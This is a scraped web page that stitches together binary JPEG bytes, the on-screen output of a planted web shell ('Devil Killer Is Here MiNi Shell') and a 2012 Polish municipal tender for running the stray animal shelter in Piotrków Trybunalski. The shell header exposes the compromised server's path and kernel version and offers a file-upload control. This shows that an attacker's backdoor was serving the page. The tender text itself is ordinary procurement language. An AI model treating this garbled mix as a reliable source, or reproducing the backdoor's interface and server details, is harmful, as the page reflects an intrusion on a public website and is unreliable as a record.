JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121128/476758-N-2012.html

<p class="kh_header"><b>Piotrków Trybunalski: Prowadzenie Schroniska dla Bezdomnych Zwierząt w Piotrkowie Trybunalskim w 2013 roku.</b><br>
<b>Numer ogłoszenia: 476758 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie Schroniska dla Bezdomnych Zwierząt w Piotrkowie Trybunalskim w 2013 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Orientacyjna ilość zwierząt z terenu Miasta Piotrkowa Trybunalskiego przebywających              w Schronisku to średnio 300 psów i 50 kotów.

Szczegółowy opis przedmiotu zamówienia:
1.	Prowadzenie schroniska dla bezdomnych zwierząt w zakresie: 
1.	stosowanie sie do postanowień regulaminu, 
2.	całodobowe zapewnienie opieki zwierzętom przebywającym w schronisku,
3.	codzienne karmienie i pielęgnowanie zwierząt zgodnie z obowiązującymi wymogami i normami żywienia zwierząt,
4.	całodobową dyspozycyjność oraz wyznaczenie osoby odpowiedzialnej za pełnienie dyżuru pod ogólnodostępnym numerem telefonu w schronisku,
5.	zapobieganie bezdomności zwierząt poprzez poszukiwanie dla nich właścicieli  (organizowanie aukcji, sprzedaży, umieszczanie zdjęć wraz z opisem na stronie internetowej), 
6.	ograniczenie populacji zwierząt w schronisku poprzez ich obligatoryjną sterylizację i kastrację,
7.	zapewnienie stałej opieki weterynaryjnej nad zwierzętami w schronisku w zakresie kontroli stanu zdrowia, profilaktyki i leczenia oraz zwalczania pasożytów wewnętrznych i zewnętrznych,
8.	szczepienie wszystkich zwierząt przeciwko wściekliźnie zgodnie z obowiązującymi przepisami,
9.	szczepienia profilaktyczne zwierząt przeciw chorobom zakaźnym zgodnie                           z obowiązującymi przepisami,
10.	obserwację zwierząt, które pokąsały człowieka lub podejrzanych o wściekliznę oraz powiadomienie Powiatowego Lekarza Weterynarii o tym fakcie,
11.	 trwałe znakowanie zwierząt przebywających w schronisku za pomocą czipów przekazanych przez Zamawiającego oraz wprowadzanie danych każdego oznakowanego psa do bazy danych,   
12.	stałe i okresowe wyłapywanie bezdomnych zwierząt wyłącznie w granicach administracyjnych Miasta Piotrkowa Trybunalskiego w ramach akcji ogłoszonej przez Prezydenta Miasta oraz zgłoszeń mieszkańców Miasta Piotrkowa Trybunalskiego do organu Policji, Straży  Miejskiej lub schroniska i ich transport do schroniska,
13.	przyjmowanie i utrzymywanie w schronisku zwierząt bezdomnych wyłącznie            z terenu Miasta Piotrkowa Trybunalskiego,
14.	wyłapywanie zwierząt przy użyciu wyłącznie urządzeń specjalistycznych przeznaczonych do wyłapywania zwierząt,
15.	zapewnienie pomocy weterynaryjnej oraz służb zabezpieczających akcję wyłapywania (Policję, Straż Miejską), podczas wyłapywania bezdomnych zwierząt w przypadku konieczności użycia środków farmakologicznych,
16.	reagowanie na zgłoszenia osób fizycznych i prawnych - wyjazdy na interwencję:
a)	w przypadku zgłoszeń dotyczących zwierząt agresywnych stwarzających 
 zagrożenie dla  ludzi - niezwłocznie, jednak nie później niż w ciągu 1 godziny od  momentu przyjęcia zgłoszenia,
b)	w przypadku zgłoszeń dotyczących rannych zwierząt w  wyniku wypadku -  niezwłocznie, jednak nie później niż  w ciągu 2 godzin od momentu przyjęcia zgłoszenia,
c)	w innych przypadkach - niezwłocznie, jednak nie później niż w dniu przyjęcia zgłoszenia,
17.	zapewnienie całodobowej opieki lekarskiej w stosunku do zwierząt bezdomnych poszkodowanych w wypadkach ulicznych,
18.	prowadzenie wykazu zwierząt przebywających w schronisku, zawierającego:
a)	opis zwierzęcia, w tym jego gatunek, wiek, płeć, maść i oznakowanie oraz imię,
b)	datę przyjęcia do schroniska oraz imię, nazwisko i adres osoby przekazującej zwierzę do schroniska lub inne okoliczności, na podstawie których zwierzę znalazło się w schronisku,
c)	dane dotyczące kwarantanny,
d)	dane dotyczące przeprowadzonych szczepień i zabiegów weterynaryjnych,   oznakowanych,
e)	datę opuszczenia schroniska oraz imię, nazwisko i adres osoby, której przekazano zwierzę,
f)	datę śmierci z podaniem przyczyny,
19.	wydawanie zwierząt ze schroniska wraz z wypisem z wykazu zawierającym informacje, o których mowa w ust. 3 pkt 18,
20.	prowadzenie książki kontroli weterynaryjnej, do której wpisywane są zalecenia urzędowego lekarza weterynarii,
21.	zakup leków i innego wyposażenia gabinetu weterynaryjnego,
22.	oddawanie do utylizacji zwłok zwierząt padłych lub uśpionych, 
23.	bieżącą naprawę i konserwację obiektów, urządzeń i wyposażenia schroniska oraz utrzymanie czystości w obiektach i na terenie schroniska,  w tym usuwanie nieczystości,
24.	przeprowadzanie dezynsekcji, dezynfekcji oraz deratyzacji, zgodnie                               z obwiązującymi przepisami,
25.	zabezpieczenie obiektu we wszystkie środki potrzebne do normalnego funkcjonowania schroniska, w tym zabezpieczenie pod kątem przestrzegania przepisów przeciwpożarowych i BHP w zakresie wynikającym z eksploatacji obiektu,
26.	dbanie o powierzony majątek Miasta, nie dopuszczając do jego dekapitalizacji;
27.	całodobowe zabezpieczenie terenu i obiektu,
28.	zgłaszanie Zamawiającemu uwag o stanie technicznym obiektów,
29.	obsługa kotłowni wraz z instalacjami (w tym zakup opału) oraz obsługa kotłów warzelnych ciśnieniowych przez osoby do tego uprawnione,
30.	utrzymywanie w sprawności wszystkich urządzeń wraz z instalacjami zgodnie                                         z wymaganiami stosownych przepisów w tym zakresie oraz przeprowadzanie przeglądów technicznych zgodnie z przepisami prawa budowlanego,
31.	utrzymanie porządku na istniejących terenach zieleni i zakładanie nowych              w obrębie schroniska,
32.	prowadzenie książek obiektów zgodnie z obowiązującymi przepisami prawa,
33.	zawieranie umów na: dostawę energii elektrycznej, wody, odprowadzanie ścieków, wywóz odpadów stałych, telefon, internet oraz utylizację zwłok zwierzęcych z odpowiednimi instytucjami w zakresie obowiązywania umowy oraz ponoszenie kosztów z tego tytułu,
34.	organizowanie, zabieganie o dodatkowe fundusze i inne środki niezbędne do prawidłowego utrzymania i funkcjonowania schroniska, w instytucjach                        i jednostkach spoza Urzędu Miasta,
35.	przedkładanie informacji raz na miesiąc, zawierających dane o zwierzętach  osobno psy i koty, z wyszczególnieniem numeru inwentarzowego:
1)	przyjętych do schroniska, 
2)	oddanych do adopcji,
3)	poddanych szczepieniom przeciwko wściekliźnie i chorobom zakaźnym,
4)	poddanych eutanazji,
5)	padłych,
           a  ponadto dla zwierząt oznakowanych: 
a)ilość zwierząt oznakowanych - należy podać dane identyfikacyjne                             (nr mikroczipa, data wszczepienia, miejsce wszczepienia), w tym:
- przekazanych do adopcji (uwaga: w przypadku adopcji oznakowanego zwierzęcia dokumentacja winna zawierać datę adopcji, czytelne dane adoptującego  psa  tj. (imię, nazwisko, dokładny adres, nr PESEL, i nr tel. kontaktowego), oraz podpis potwierdzający  wyrażenie zgody na umieszczenie jego danych osobowych w Bazie Danych Zwierząt Oznakowanych. 
- padłych, zmarłych.
36.	przedkładanie sprawozdań finansowo - rzeczowych (raz na miesiąc), dotyczących rozliczeń wydatków związanych z prowadzeniem schroniska wraz   z kserokopiami faktur i rachunków. Ponadto podawanie informacji dotyczących rozliczeń wydatków związanych z wyjazdami na interwencje do wglądu karty drogowe na każdy używany samochód wykorzystywany do interwencji,
37.	założenie, prowadzenie i systematyczne aktualizowanie strony internetowej schroniska dla bezdomnych zwierząt,
38.	współpraca z Referatem Usług Komunalnych w zakresie realizacji programu opieki nad zwierzętami bezdomnymi oraz zapobiegania bezdomności zwierząt na terenie m. Piotrkowa Trybunalskiego,
39.	wykonywanie wszystkim zabiegów weterynaryjnych przez lekarza.

2.	Prowadzenie spraw związanych z udzielaniem opieki kotom wolno żyjącym poprzez:
1)	przekazywanie nieodpłatnie karmy osobom dokarmiającym koty, tzw. karmicielom kotów o wartości do 200,00 zł miesięcznie, 
2)	apele do właścicieli budynków wielorodzinnych o umożliwianie kotom schronienia                         w piwnicach, np. poprzez pozostawienie uchylnych okienek piwnicznych.
4. Prowadzenie spraw związanych z zapobieganiem bezdomności kotów wolno żyjących poprzez sterylizację/kastrację: zabiegiem objętych będzie nie mniej niż 80 zwierząt.
5. Czynności obejmujące zadanie, o którym mowa w ust. 4 i 5:
1)	poinformowanie społeczeństwa w środkach masowego przekazu o możliwości wykonania sterylizacji/kastracji kotów wolno żyjących oraz ich dokarmiania ze środków Miasta Piotrkowa Tryb.,
- w celu dokonania zabiegu zwierzę należy dostarczyć do schroniska,
- karmę wydaje pracownik schroniska.
2)	przeprowadzenie wywiadu i rozeznania mającego na celu stwierdzenia, że kot jest zwierzęciem wolno żyjącym,
3)	stosowanie się do postanowień regulaminu wydawania wniosków na sterylizację/ kastrację kotów wolno żyjących oraz na wydawanie karmy - załącznik nr 3,
4)	wydawanie wniosków - skierowań na karmę i sterylizację/kastrację tylko do wyczerpania limitów przyznanych na zapewnieniem opieki wolno żyjącym kotom oraz zapobiegania ich bezdomności,
5)	comiesięczne rozliczanie w formie sprawozdania - z wykonanych zabiegów sterylizacji/ kastracji wolno żyjących kotów kotek oraz przekazanej karmy dla kotów, do którego dołączone zostaną kserokopie zrealizowanych wniosków. 

.6. Zamawiający wymaga, aby przy wykonywaniu ww czynności, były przestrzegane        przepisy wynikające:
Zamawiający wymaga, aby przy wykonywaniu czynności, o których mowa w § 1, były
przestrzegane przepisy wynikające:
1)	z ustawy z dnia 21.08.1997 r. o ochronie zwierząt ( Dz. U. z 2003 r., Nr 106, poz. 1002 z późn. zm.), 
2)	z Rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 4 stycznia 2008 r.                   w sprawie szczegółowych wymagań weterynaryjnych dla prowadzenia działalności w zakresie organizowania targów, wystaw, pokazów lub konkursów zwierząt (Dz. U                  z 2008 r., Nr 11, poz. 67),
3)	z Rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 23 czerwca 2004 r.
    w sprawie szczegółowych wymagań weterynaryjnych dla prowadzenia schronisk dla zwierząt ( Dz. U. z 2004 r., Nr 158, poz. 1657),
4)	z ustawy z dnia 11.03.2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób  zakaźnych zwierząt (Dz. U. z 2008 r. , Nr 213, poz. 1342 z późn. zm.),
5)	z Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                      26.08.1998 r. w sprawie zasad i warunków wyłapywania bezdomnych zwierząt (Dz. U. z 1998 r. , nr 116, poz. 753),
6)	z uchwały Rady Miasta Piotrkowa Trybunalskiego w sprawie przyjęcia programu opieki nad zwierzętami bezdomnymi oraz zapobiegania bezdomności zwierząt na terenie m. Piotrkowa Trybunalskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.38.00.00-1, 85.20.00.00-3, 98.38.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zamawiający uzna za spełniony w przypadku, gdy wykonawca:
a)	Przedłoży zezwolenie na prowadzenie schronisk dla bezdomnych zwierząt, o którym mowa w art. 7 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012 r., poz. 391 z późn. zm.).

Sposób dokonania oceny spełnienia wymaganych warunków:
-przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
-niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna za spełniony w przypadku, gdy wykonawca:
a)	Wykaże co najmniej jedno zamówienie (wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia tj. prowadzenie schroniska dla bezdomnych zwierząt        o wartości co najmniej 100 000,00 PLN - wg załącznika nr  4.
b)	Załączy dokumenty potwierdzające, że usługi wyszczególnione w załączniku nr  4 zostały wykonane lub są wykonywane należycie
Sposób dokonania oceny spełnienia wymaganych warunków:
-przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
-niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Warunek dotyczący, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 
b)	Oświadczenie o dysponowaniu niezbędnym do wykonania zamówienia sprzętem, którym dysponuje lub będzie dysponował wykonawca, tj.: środek transportu przystosowany do przewozu schwytanych zwierząt spełniający warunki art. 24 ustawy o ochronie zwierząt, chłodnia na zwłoki zwierząt, chłodnia na żywność, sprzęt specjalistyczny do wyłapywania zwierząt (klatki, chwytaki, kagańce) - wg załącznika nr 7
Sposób dokonania oceny spełnienia wymaganych warunków:
-przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
-niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Warunek dotyczący, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 
a)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz                              z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
- co najmniej 5 pielęgniarzy zwierząt,
- lekarz weterynarii, - wg załącznika nr 3.
Sposób dokonania oceny spełnienia wymaganych warunków:
-przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
-niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1.
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kseropię potwierdzoną przez notariusza).
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ww. ustawy. W przypadku podmiotów występujących wspólnie odpis składa każdy z nich.
5.	Zezwolenie na prowadzenie schronisk dla bezdomnych zwierząt, o którym mowa w art. 7 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z.2008 r., Nr. 05, poz. 236 z późn. zm.).
Uwaga! Powyższe dotyczy wyłącznie przedsiębiorców.
6.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2.
7. Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wg załącznika nr 5.
8.	Umowę lub wstępne pisemne oświadczenie na odbiór padłych zwierząt przez zakład specjalistyczny;
9.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 6.
10.	Wykaz niezbędnego do wykonania zamówienia sprzętu, którym dysponuje lub będzie dysponował wykonawca - wg załącznika nr 7;
12.	Oświadczenie o dyspozycyjności - wg załącznika nr 8;
13.	Oświadczenie o pozyskaniu środków finansowych z instytucji i jednostek spoza Urzędu Miasta w wysokości niezbędnej do prawidłowego utrzymania                          i funkcjonowania schroniska - wg załącznika nr 9;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
